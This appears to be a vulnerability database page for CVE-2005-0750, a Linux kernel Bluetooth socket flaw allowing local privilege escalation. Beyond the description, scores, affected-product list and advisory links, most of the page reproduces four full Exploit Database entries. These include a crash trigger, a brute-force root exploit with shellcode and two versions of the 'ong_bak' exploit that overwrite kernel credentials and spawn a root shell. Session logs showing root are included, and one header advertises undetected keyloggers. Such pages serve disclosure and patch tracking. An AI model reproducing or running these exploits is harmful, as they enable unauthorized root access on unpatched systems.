CVE-2005-0750: Detail

CVE-2005-0750

0.21%V4
Local
2005-04-03
03h00 +00:00
2017-10-09
22h57 +00:00

CVE Descriptions

The bluez_sock_create function in the Bluetooth stack for Linux kernel 2.4.6 through 2.4.30-rc1 and 2.6 through 2.6.11.5 allows local users to gain privileges via (1) socket or (2) socketpair call with a negative protocol value.

CVE Information

Metrics

Metrics Score Severity CVSS Vector Source
V2 7.2 AV:L/AC:L/Au:N/C:C/I:C/A:C nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood that a vulnerability will be exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVEs by their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVEs. The percentile thus serves to compare a CVE's EPSS score with that of other CVEs.

Exploit Information

Exploit Database EDB-ID: 25287

Publication date: 2005-03-27 22h00 +00:00
Author: ilja van sprundel
EDB Verified: Yes

/*
 * EDB Note: Update can be found here ~ https://www.exploit-db.com/exploits/926/
 *
 * source: https://www.securityfocus.com/bid/12911/info
 *
 * A local signed-buffer-index vulnerability affects the Linux kernel because
 * it fails to securely handle signed values when validating memory indexes.
 *
 * A local attacker may leverage this issue to gain escalated privileges on an
 * affected computer.
 */

#include <stdio.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <bluetooth/bluetooth.h>
#include <bluetooth/hci.h>
#include <bluetooth/hci_lib.h>

int main(void)
{
    int ctl;

    /* Open HCI socket, passing a negative protocol value */
    if ((ctl = socket(AF_BLUETOOTH, SOCK_RAW, -1111)) < 0) {
        perror("Can't open HCI socket.");
        exit(1);
    }
    return 0;
}

Exploit Database EDB-ID: 25289

Publication date: 2005-10-18 22h00 +00:00
Author: backdoored.net
EDB Verified: Yes

/* EDB Note: Update can be found here ~ https://www.exploit-db.com/exploits/25290/ source: https://www.securityfocus.com/bid/12911/info A local signed-buffer-index vulnerability affects the Linux kernel because it fails to securely handle signed values when validating memory indexes. A local attacker may leverage this issue to gain escalated privileges on an affected computer. */ /* LINUX KERNEL < 2.6.11.5 BLUETOOTH STACK LOCAL ROOT EXPLOIT * * 19 October 2005 http://backdoored.net Visit us for Undetected keyloggers and packers.Thanx h4x0r bluetooth $ id uid=1000(addicted) gid=100(users) groups=100(users) h4x0r bluetooth $ h4x0r bluetooth $ ./backdoored-bluetooth KERNEL Oops. Exit Code = 11.(Segmentation fault) KERNEL Oops. Exit Code = 11.(Segmentation fault) KERNEL Oops. Exit Code = 11.(Segmentation fault) KERNEL Oops. Exit Code = 11.(Segmentation fault) KERNEL Oops. Exit Code = 11.(Segmentation fault) Checking the Effective user id after overflow : UID = 0 h4x0r bluetooth # id uid=0(root) gid=0(root) groups=100(users) h4x0r bluetooth # h4x0r bluetooth # dmesg PREEMPT SMP Modules linked in: CPU: 0 EIP: 0060:[<c0405ead>] Not tainted VLI EFLAGS: 00010286 (2.6.9) EIP is at bt_sock_create+0x3d/0x130 eax: ffffffff ebx: ffebfe34 ecx: 00000000 edx: c051bea0 esi: ffffffa3 edi: ffffff9f ebp: 00000001 esp: c6729f1c ds: 007b es: 007b ss: 0068 Process backdoored-bluetooth (pid: 8809, threadinfo=c6729000 task=c6728a20) Stack: cef24e00 0000001f 0000001f c6581680 ffffff9f c039a3bb c6581680 ffebfe34 00000001 b8000c80 bffff944 c6729000 c039a58d 0000001f 00000003 ffebfe34 c6729f78 00000000 c039a60b 0000001f 00000003 ffebfe34 c6729f78 b8000c80 Call Trace: [<c039a3bb>] __sock_create+0xfb/0x2a0 [<c039a58d>] sock_create+0x2d/0x40 [<c039a60b>] sys_socket+0x2b/0x60 [<c039b4e8>] sys_socketcall+0x68/0x260 [<c0117a9c>] finish_task_switch+0x3c/0x90 [<c0117b07>] schedule_tail+0x17/0x50 [<c0115410>] do_page_fault+0x0/0x5e9 [<c01031af>] syscall_call+0x7/0xb Code: 24 0c 89 7c 24 10 83 fb 07 0f 
8f b1 00 00 00 8b 04 9d 60 a4 5d c0 85 c0 0f 84 d7 00 00 00 85 c0 be a3 ff ff ff 0f 84 93 00 00 00 <8b> 50 10 bf 01 00 00 00 85 d2 74 37 b8 00 f0 ff ff 21 e0 ff 40 */ #include <stdio.h> #include <stdlib.h> #include <sys/socket.h> #include <arpa/inet.h> #include <sys/types.h> #include <unistd.h> #include <limits.h> #include <signal.h> #include <sys/wait.h> #define KERNEL_SPACE_MEMORY_BRUTE_START 0xc0000000 #define KERNEL_SPACE_MEMORY_BRUTE_END 0xffffffff #define KERNEL_SPACE_BUFFER 0x100000 char asmcode[] = /*Global shellcode*/ "xb8x00xf0xffxffx31xc9x21xe0x8bx10x89x8a" "x80x01x00x00x31xc9x89x8ax7cx01x00x00x8b" "x00x31xc9x31xd2x89x88x90x01x00x00x89x90" "x8cx01x00x00xb8xffxffxffxffxc3"; struct net_proto_family { int family; int (*create) (int *sock, int protocol); short authentication; short encryption; short encrypt_net; int *owner; }; int check_zombie_child(int status,pid_t pid) { waitpid(pid,&status,0); if(WIFEXITED(status)) { if(WEXITSTATUS(status) != 0xFF) exit(-1); } else if (WIFSIGNALED(status)) { printf("KERNEL Oops. Exit Code = %d.(%s) ",WTERMSIG(status),strsignal(WTERMSIG(status))); return(WTERMSIG(status)); } } int brute_socket_create (int negative_proto_number) { socket(AF_BLUETOOTH,SOCK_RAW, negative_proto_number); /* overflowing proto number with negative 32bit value */ int i; i = geteuid(); printf("Checking the Effective user id after overflow : UID = %d ",i); if(i) exit(EXIT_FAILURE); printf("0wnage D0ne bro. 
"); execl("/bin/sh","sh",NULL); exit(EXIT_SUCCESS); } int main(void) { pid_t pid; int counter; int status; int *kernel_return; char kernel_buffer[KERNEL_SPACE_BUFFER]; unsigned int brute_start; unsigned int where_kernel; struct net_proto_family *bluetooth; bluetooth = (struct net_proto_family *) malloc(sizeof(struct net_proto_family)); bzero(bluetooth,sizeof(struct net_proto_family)); bluetooth->family = AF_BLUETOOTH; bluetooth->authentication = 0x0; /* No Authentication */ bluetooth->encryption = 0x0; /* No Encryption */ bluetooth->encrypt_net = 0x0; /* No Encrypt_net */ bluetooth->owner = 0x0; /* No fucking owner */ bluetooth->create = (int *) asmcode; kernel_return = (int *) kernel_buffer; for( counter = 0; counter < KERNEL_SPACE_BUFFER; counter+=4, kernel_return++) *kernel_return = (int)bluetooth; brute_start = KERNEL_SPACE_MEMORY_BRUTE_START; printf("Bluetooth stack local root exploit "); printf("http://backdoored/net"); while ( brute_start < KERNEL_SPACE_MEMORY_BRUTE_END ) { where_kernel = (brute_start - (unsigned int)&kernel_buffer) / 0x4 ; where_kernel = -where_kernel; pid = fork(); if(pid == 0 ) brute_socket_create(where_kernel); check_zombie_child(status,pid); brute_start += KERNEL_SPACE_BUFFER; fflush(stdout); } return 0; }
Exploit Database EDB-ID: 926

Publication date: 2005-10-25 22h00 +00:00
Author: qobaiashi
EDB Verified: Yes

/* Due to many responses i've improved the exploit to cover more systems! ONG_BAK v0.9 [october 24th 05] """""""""""""""""""""""""""""""""""" o universal "shellcode" added o try to use all possible memory regions o bugfixes qobaiashi@voyager:~/w00nf/kernelsploit> ./ong_bak -100222 -|-bluez local root exploit v.0.9 -by qobaiashi- | |- i've found kernel 2.6.11.4-20a-default |- trampoline is at 0x804869c |- trying... |- [ecx: bf8d0000 ] |- suitable value found!using 0xbf8d0000 |- the time has come to push the button... sh-3.00# exit ONG_BAK v0.3 [april 8th 05] """"""""""""""""""""""""""""""""" ong_bak now checks the value of ecx and launches the exploit in case a suitable value has been found! ONG_BAK v0.1 [april 4th 05] """"""""""""""""""""""""""""""""" local root exploit for the bluetooth bug usage: the bug is quite stable so you can't realy fuck things up if you stick to the following: play around with the negative argument until ecx points to our data segment: qobaiashi@voyager:~> ./ong_bak -1002341 -|-local bluez exploit v.0.3 -by qobaiashi- | |- i've found kernel 2.6.4-52-default |- trying... |- [ecx: 0b8f0f0f ] qobaiashi@voyager:~> ./ong_bak -10023411 -|-local bluez exploit v.0.3 -by qobaiashi- | |- i've found kernel 2.6.4-52-default |- trying... |- [ecx: 0809da40 ] |- suitable value found!using 0x0809da40 |- the time has come to push the button.. qobaiashi@voyager:~> id uid=0(root) gid=0(root) Gruppen=14(uucp),16(dialout),17(audio),33(video),100(users) qobaiashi@voyager:~> that's it. unfortunately it's not yet very practicable.. 
qobaiashi@u-n-f.com */ #include <sys/klog.h> #include <sys/types.h> #include <unistd.h> #include <stdlib.h> #include <sys/socket.h> #include <bluetooth/bluetooth.h> #include <bluetooth/hci.h> #include <bluetooth/hci_lib.h> #include <sys/utsname.h> #include <sys/mman.h> void usage(char *path); //===================[ kernel 2.6* privilege elevator ]=============================== //===================[ qobaiashi@u-n-f.com ]=============================== //globals int uid, gid; extern load_highlevel; __asm__ ( "load_highlevel: \n" "xor %eax, %eax \n" "mov $0xffffe000, %eax\n" "and %esp,%eax \n" "pushl %eax \n" "call set_root \n" "pop %eax \n" //ret to userspace-2.6.* version " cli \n" " pushl $0x7b \n" //DS user selector " pop %ds \n" " pushl %ds \n" //SS " pushl $0xc0000000 \n" //ESP " pushl $0x246 \n" //EFLAGS " pushl $0x73 \n" //CS user selector " pushl $shellcode \n" //EIP must not be a push /bin/sh shellcode!! "iret \n" ); void set_root(unsigned int *ts) { ts = (int*)*ts; int cntr; //hope you guys are int aligned for(cntr = 0; cntr <= 512; cntr++, ts++) if( ts[0] == uid && ts[1] == uid && ts[4] == gid && ts[5] == gid) ts[0] = ts[1] = ts[4] = ts[5] = 0; } void shellcode() { system("/bin/sh"); exit(0); } //==================================================================================== //==================================================================================== main(int argc, char *argv[]) { char buf[2048]; int sock, *mod = (int*)buf; int *linker = 0; unsigned int arg; int tmp; char *check; struct utsname vers; gid = getgid(); uid = getuid(); printf("-|-bluez local root exploit v.0.9 -by qobaiashi-\n |\n"); if (uname(&vers) < 0) printf(" |- couldn't determine kernel version\n"); else printf(" |- i've found kernel %s\n", vers.release); printf(" |- trampoline is at %p\n", &load_highlevel); if (argc < 2) { usage(argv[0]); exit(1); } if (argc == 2) arg = strtoul(argv[1], 0, 0); if (fork() != 0)//parent watch the Oops { //previous Oops printing 
usleep(1000); if ((tmp = klogctl(0x3, buf, 1700)) > -1) { check = strstr(buf, "ecx: "); printf(" |- [%0.14s]\n", check); check+=5; *(check+9) = 0x00;*(--check) = 'x';*(--check) = '0'; mod = (unsigned int*)strtoul(check, 0, 0); //page align FIXME: might be booggy int *ecx = mod; mod = (int)mod &~ 0x00000fff; linker = mmap((void*)mod,0x2000,PROT_WRITE|PROT_READ,MAP_SHARED|MAP_ANONYMOUS|MAP_FIXED,0,0); if(linker == mod)//we could mmap the area { printf(" |- suitable value found!using %p\n", mod); printf(" |- the time has come to push the button... \n"); for (sock = 0;sock <= 1;sock++) //use ecx *(ecx++) = (int)&load_highlevel; //link to shellcode } else { printf(" |- could not mmap %p\n", mod); if( brk((void*)mod+0x200 ) == -1) { printf(" |- could not brk to %p\n", mod); printf(" `-------------------------------\n"); exit(-1); } //here we did it printf(" |- suitable value found!using %p\n", mod); printf(" |- the time has come to push the button... \n"); for (sock = 0;sock <= 1;sock++) //use ecx *(ecx++) = (int)&load_highlevel; //link to shellcode } if ((sock = socket(AF_BLUETOOTH, SOCK_RAW, arg)) < 0) exit(1); } return 0; } if (fork() == 0)//child does the pre-exploit { printf(" |- trying...\n"); if ((sock = socket(AF_BLUETOOTH, SOCK_RAW, arg)) < 0) { printf(" |- something went w0rng (invalid value)\n"); exit(1); } } exit(0); } /*****************\ |** usage **| \*****************/ void usage(char *path) { printf(" |----------------------------\n"); printf(" | usage: %s <negative value> \n", path); printf(" | tested:\n"); printf(" | SuSE 9.1: -10023411 \n"); printf(" | -41122122 \n"); printf(" | Kernel 2.6.11: -10023 \n"); printf(" | SuSE 9.3: -100222\n"); printf(" | -102901\n"); printf(" `-----------------------\n"); exit(0); } // 1st post: milw0rm.com [2005-04-09] // milw0rm.com [2005-10-26]
Exploit Database EDB-ID: 25288

Publication date: 2005-04-07 22h00 +00:00
Author: qobaiashi
EDB Verified: Yes

/* EDB Note: Update can be found here ~ https://www.exploit-db.com/exploits/926/ source: https://www.securityfocus.com/bid/12911/info A local signed-buffer-index vulnerability affects the Linux kernel because it fails to securely handle signed values when validating memory indexes. A local attacker may leverage this issue to gain escalated privileges on an affected computer. */ /* ONG_BAK v0.3 [april 8th 05] """"""""""""""""""""""""""""""""" ong_bak now checks the value of ecx and launches the exploit in case a suitable value has been found! ONG_BAK v0.1 [april 4th 05] """"""""""""""""""""""""""""""""" local root exploit for the bluetooth bug usage: the bug is quite stable so you can't realy fuck things up if you stick to the following: play around with the negative argument until ecx points to our data segment: qobaiashi@voyager:~> id uid=1000(qobaiashi) gid=100(users) Gruppen=14(uucp),16(dialout),17(audio),33(video),100(users) qobaiashi@voyager:~> ./ong_bak -1002341 -|-local bluez exploit v.0.3 -by qobaiashi- | |- i've found kernel 2.6.4-52-default |- trying... |- [ecx: 0b8f0f0f ] qobaiashi@voyager:~> ./ong_bak -10023411 -|-local bluez exploit v.0.3 -by qobaiashi- | |- i've found kernel 2.6.4-52-default |- trying... |- [ecx: 0809da40 ] |- suitable value found!using 0x0809da40 |- the time has come to push the button.. qobaiashi@voyager:~> id uid=0(root) gid=0(root) Gruppen=14(uucp),16(dialout),17(audio),33(video),100(users) qobaiashi@voyager:~> the parent process becomes root. that's it. unfortunately it's not yet very practicable.. 
qobaiashi@u-n-f.com */ #include <sys/klog.h> #include <sys/types.h> #include <unistd.h> #include <stdlib.h> #include <sys/socket.h> #include <bluetooth/bluetooth.h> #include <bluetooth/hci.h> #include <bluetooth/hci_lib.h> #include <sys/utsname.h> #define BRKVAL 0x0cec9000 //should be enough but fix it if you get an error void usage(char *path); //due to changing task_structs we need different offsets char k_give_root[] = //----[ give root in ring0/tested on linux2.6.5/x86/ by -q ]-----\\ "\x90\x90\x90\x90" "\x90\x90\x90\x90" "\x31\xc0" // xor %eax,%eax "\xb8\x00\xe0\xff\xff" // mov $0xffffe000,%eax "\x21\xe0" // and %esp,%eax "\x8b\x00" // mov (%eax),%eax "\x8b\x80\xa4\x00\x00\x00" // mov 0xa4(%eax),%eax "\xc7\x80\xf0\x01\x00\x00\x00" // movl $0x0,0x1f0(%eax) "\x00\x00\x00" "\xc7\x80\xf4\x01\x00\x00\x00" // movl $0x0,0x1f4(%eax) "\x00\x00\x00" "\xc7\x80\x00\x02\x00\x00\x00" // movl $0x0,0x200(%eax) "\x00\x00\x00" "\xc7\x80\x04\x02\x00\x00\x00" // movl $0x0,0x204(%eax) "\x00\x00\x00" "\x31\xc0" // xor %eax,%eax "\x40" // inc %eax "\xcd\x80" // int $0x80 ; char k_give_root2[] = //----[ give root in ring0/tested linux2.6.11/x86/ by -q ]-----\\ "\x90\x90\x90\x90" "\x90\x90\x90\x90" "\x31\xc0" // xor %eax,%eax "\xb8\x00\xe0\xff\xff" // mov $0xffffe000,%eax "\x21\xe0" // and %esp,%eax "\x8b\x00" // mov (%eax),%eax "\x8b\x80\x9c\x00\x00\x00" // mov 0x9c(%eax),%eax "\xc7\x80\x68\x01\x00\x00\x00" // movl $0x0,0x168(%eax) "\x00\x00\x00" "\xc7\x80\x78\x01\x00\x00\x00" // movl $0x0,0x178(%eax) "\x00\x00\x00" "\xc7\x80\x6c\x01\x00\x00\x00" // movl $0x0,0x16c(%eax) "\x00\x00\x00" "\xc7\x80\x7c\x01\x00\x00\x00" // movl $0x0,0x17c(%eax) "\x00\x00\x00" "\x31\xc0" // xor %eax,%eax "\x40" // inc %eax "\xcd\x80" // int $0x80 ; main(int argc, char *argv[]) { char buf[2048]; int sock, *mod = (int*)buf; unsigned int arg; int tmp; char *check, *ong_code = 0; struct utsname vers; printf("-|-local bluez exploit v.0.3 -by qobaiashi-\n |\n"); if (uname(&vers) < 0) printf(" |- couldn't 
determine kernel version\n"); else { printf(" |- i've found kernel %s\n", vers.release); if(strstr(vers.release, "2.6.11") > 0) ong_code = k_give_root2; if(strstr(vers.release, "2.6.4") > 0) ong_code = k_give_root; } if (ong_code == 0) { printf(" |- no supported version found..trying 2.6.4 code\n"); ong_code = k_give_root; } if( brk((void*)BRKVAL) == -1 ) { printf(" |- brk failed..exiting\n"); exit(1); } if (argc < 2) { usage(argv[0]); exit(1); } if (argc == 2) arg = strtoul(argv[1], 0, 0); if (argc == 3) { arg = strtoul(argv[1], 0, 0); mod = (unsigned int*)strtoul(argv[2], 0, 0); } if (fork() != 0)//parent watch the Oops { //previous Oops printing usleep(100); if ((tmp = klogctl(0x3, buf, 1700)) > -1) { check = strstr(buf, "ecx: "); printf(" |- [%0.14s]\n", check); if (*(check+5) == 0x30 && *(check+6) == 0x38) { check+=5; printf(" |- suitable value found!using 0x%0.9s\n", check); printf(" |- the time has come to push the button... check your id!\n"); *(check+9) = 0x00;*(--check) = 'x';*(--check) = '0'; mod = (unsigned int*)strtoul(check, 0, 0); for (sock = 0;sock <= 200;sock++) *(mod++) = (int)ong_code;//link to shellcode if ((sock = socket(AF_BLUETOOTH, SOCK_RAW, arg)) < 0) { printf(" |- something went w0rng (invalid value)\n"); exit(1); } } } return 0; } if (fork() == 0)//child does the exploit { for (sock = 0;sock <= 200;sock++) *(mod++) = (int)ong_code;//link to shellcode printf(" |- trying...\n"); if ((sock = socket(AF_BLUETOOTH, SOCK_RAW, arg)) < 0) { printf(" |- something went w0rng (invalid value)\n"); exit(1); } } exit(0); } /*****************\ |** usage **| \*****************/ void usage(char *path) { printf(" |----------------------------\n"); printf(" | usage: %s <negative value> \n", path); printf(" | tested:\n"); printf(" | SuSE 9.1: -10023411 \n"); printf(" | -10029 \n"); printf(" | Kernel 2.6.11: -10023 \n"); exit(0); }

Products Mentioned

Configuration 0

Conectiva>>Linux >> Version 10.0

Configuration 0

Linux>>Linux_kernel >> Version 2.4.6

Linux>>Linux_kernel >> Version 2.4.7

Linux>>Linux_kernel >> Version 2.4.8

Linux>>Linux_kernel >> Version 2.4.9

Linux>>Linux_kernel >> Version 2.4.10

Linux>>Linux_kernel >> Version 2.4.11

Linux>>Linux_kernel >> Version 2.4.12

Linux>>Linux_kernel >> Version 2.4.13

Linux>>Linux_kernel >> Version 2.4.14

Linux>>Linux_kernel >> Version 2.4.15

Linux>>Linux_kernel >> Version 2.4.16

Linux>>Linux_kernel >> Version 2.4.17

Linux>>Linux_kernel >> Version 2.4.18

Linux>>Linux_kernel >> Version 2.4.19

Linux>>Linux_kernel >> Version 2.4.20

Linux>>Linux_kernel >> Version 2.4.21

Linux>>Linux_kernel >> Version 2.4.22

Linux>>Linux_kernel >> Version 2.4.23

Linux>>Linux_kernel >> Version 2.4.24

Linux>>Linux_kernel >> Version 2.4.25

Linux>>Linux_kernel >> Version 2.4.26

Linux>>Linux_kernel >> Version 2.4.27

Linux>>Linux_kernel >> Version 2.4.28

Linux>>Linux_kernel >> Version 2.4.29

Linux>>Linux_kernel >> Version 2.6.0

Linux>>Linux_kernel >> Version 2.6.1

Linux>>Linux_kernel >> Version 2.6.2

Linux>>Linux_kernel >> Version 2.6.3

Linux>>Linux_kernel >> Version 2.6.4

Linux>>Linux_kernel >> Version 2.6.5

Linux>>Linux_kernel >> Version 2.6.6

Linux>>Linux_kernel >> Version 2.6.7

Linux>>Linux_kernel >> Version 2.6.8

Linux>>Linux_kernel >> Version 2.6.9

Linux>>Linux_kernel >> Version 2.6.10

Linux>>Linux_kernel >> Version 2.6.11

Redhat>>Enterprise_linux >> Version 4.0

Redhat>>Enterprise_linux >> Version 4.0

Redhat>>Enterprise_linux >> Version 4.0

Redhat>>Enterprise_linux_desktop >> Version 4.0

Redhat>>Fedora_core >> Version core_1.0

Redhat>>Fedora_core >> Version core_2.0

Redhat>>Fedora_core >> Version core_3.0

Redhat>>Linux >> Version 7.3

Redhat>>Linux >> Version 7.3

Redhat>>Linux >> Version 7.3

Redhat>>Linux >> Version 9.0

Suse>>Suse_linux >> Version 1.0

Suse>>Suse_linux >> Version 9.3

Ubuntu>>Ubuntu_linux >> Version 4.1

Ubuntu>>Ubuntu_linux >> Version 4.1

References

http://www.redhat.com/support/errata/RHSA-2005-366.html
Tags: vendor-advisory, x_refsource_REDHAT
http://www.redhat.com/support/errata/RHSA-2005-283.html
Tags: vendor-advisory, x_refsource_REDHAT
http://marc.info/?l=bugtraq&m=111204562102633&w=2
Tags: mailing-list, x_refsource_BUGTRAQ
http://www.securityfocus.com/bid/12911
Tags: vdb-entry, x_refsource_BID
https://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=152532
Tags: vendor-advisory, x_refsource_FEDORA
http://www.redhat.com/support/errata/RHSA-2005-293.html
Tags: vendor-advisory, x_refsource_REDHAT
http://www.redhat.com/support/errata/RHSA-2005-284.html
Tags: vendor-advisory, x_refsource_REDHAT